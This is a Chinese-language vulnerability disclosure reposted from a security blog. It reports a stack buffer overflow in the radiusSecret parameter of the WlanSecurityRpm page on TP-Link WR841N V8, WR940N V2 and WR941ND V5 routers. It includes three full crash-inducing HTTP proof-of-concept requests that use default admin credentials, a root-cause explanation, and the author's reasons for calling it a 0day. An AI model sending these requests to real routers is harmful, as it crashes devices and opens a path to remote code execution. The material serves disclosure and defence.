CTF导航 CTF导航

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

IoT 8个月前 admin
179 0 0



TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

一、基本信息

漏洞类型:缓冲区溢出

漏洞描述:TP-Link WR841N V8和TP-Link TL-WR940N V2/TL-WR941ND V5无线路由器中存在缓冲区溢出漏洞。其/userRpm/WlanSecurityRpm实现在处理radiusSecret GET参数时存在安全漏洞,允许远程攻击者利用该漏洞提交特殊请求,导致缓冲区溢出,严重时可导致任意操作系统命令的执行。

设备型号:

TP-Link TL-WR841N V8,TP-Link TL-WR940N V2/TL-WR941ND V5


二、概念验证

TP-Link TL-WR841N V8的PoC如下:

GET /userRpm/WlanSecurityRpm.htm?pskSecOpt=2&pskCipher=3&pskSecret=12345670&interval=0&secType=2&wpaSecOpt=3&wpaCipher=3&radiusIp=192.168.0.2&radiusPort=1812&radiusSecret=123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=5&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1Host: 0.0.0.0:49168User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46YWRtaW4=Connection: closeReferer: http://0.0.0.0:49168/userRpm/WlanSecurityRpm.htm?secType=0&pskSecOpt=2&pskCipher=3&pskSecret=12345670&interval=0&wpaSecOpt=3&wpaCipher=3&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=SaveCookie: Authorization=Upgrade-Insecure-Requests: 1

TL-WR941ND V5的PoC如下:

GET /MZKBGETBOHFWYCNC/userRpm/WlanSecurityRpm.htm?pskSecOpt=2&pskCipher=2&pskSecret=12345670&interval=0&wpaSecOpt=1&wpaCipher=3&radiusIp=192.168.1.2&radiusPort=1812&radiusSecret=123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123&intervalWpa=0&secType=1&wepSecOpt=1&keytype=2&keynum=1&key1=12345&length1=5&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveReferer: http://192.168.0.1/YOKQCLEBKGHAVJDB/userRpm/WlanSecurityRpm.htm?pskSecOpt=2&pskCipher=2&pskSecret=12345670&interval=0&secType=2&wpaSecOpt=1&wpaCipher=3&radiusIp=192.168.1.2&radiusPort=1812&radiusSecret=123&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=SaveCookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3DUpgrade-Insecure-Requests: 1

TP-Link TL-WR940N V2的PoC如下:

GET /MZKBGETBOHFWYCNC/userRpm/WlanSecurityRpm.htm?pskSecOpt=1&pskCipher=2&pskSecret=12345670&interval=0&secType=2&wpaSecOpt=2&wpaCipher=1&radiusIp=192.168.1.2&radiusPort=1812&radiusSecret=123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123123&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveReferer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=1&pskCipher=2&pskSecret=12345670&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=SaveCookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3DUpgrade-Insecure-Requests: 1

三、漏洞原理

当Web管理组件接收到GET请求时,其/userRpm/WlanSecurityRpm组件在处理radiusSecret GET参数时会实现安全漏洞。radiusSecret参数的长度可以是任意长度,不检查就入栈,导致栈溢出。攻击者可以利用该漏洞覆盖返回地址,进而被利用达到远程任意命令执行的效果。


通过仿真成功的固件仿真界面如下:

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出


TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出


TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

发送PoC后目标服务崩溃:

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

四、判断为0day漏洞的依据

在NVD数据库中搜索WlanSecurityRpm关键字,发现一个漏洞:CVE-2017-14219,该漏洞是TP-Link WRN 240的XSS漏洞,其攻击向量是ESSID,与该漏洞的漏洞类型和参数不同。因此,判定为0day漏洞。


在CNVD数据库中搜索WlanSecurityRpm关键字,发现一个漏洞:CNVD-2013-14724,该漏洞是TP-Link TL-WR740N/TL-WR740ND的跨站请求伪造漏洞,与该漏洞类型不同,因此判定为0day漏洞。




感谢您抽出

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

.

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

.

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

来阅读本文

TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

点它,分享点赞在看都在这里


原文始发于微信公众号(Ots安全):TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出

版权声明:admin 发表于 2023年8月22日 下午5:11。
转载请注明:TP-Link WR940N、WR941ND V5、WR841N型号无线路由器堆栈内存溢出 | CTF导航

相关文章

D-Link DSL-3782 代码注入漏洞CVE-2022-34527分析
admin
875
星链Starlink 低轨卫星的波束形成策略和信号分析
admin
600
复现|摄像头固件重打包
admin
1,454
Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞链复现
admin
372
解决企业内物联网的身份问题
admin
244
NetGear路由器 多个RCE漏洞复现
admin
615

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Dumping and extracting the SpaceX Starlink User Terminal firmware
0
SSD ADVISORY – ZYXEL VPN SERIES PRE-AUTH REMOTE COMMAND EXECUTION
0
CVE-2024-20356: Jailbreaking a Cisco appliance to run DOOM
0
Hacking into colgate smart tooth brush for fun!
0
【BlackHat 2024】SystemUI As EvilPiP: 针对现代移动设备的劫持攻击
0
迅捷PoE*AC路由一体机FR100P-AC固件提取研究
0
路灯频率?自由控制路灯?
0
TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389
0
西湖论剑2024 IOT赛后复盘及mqtt rce详解
0
Hunting for Unauthenticated n-days in Asus Routers
0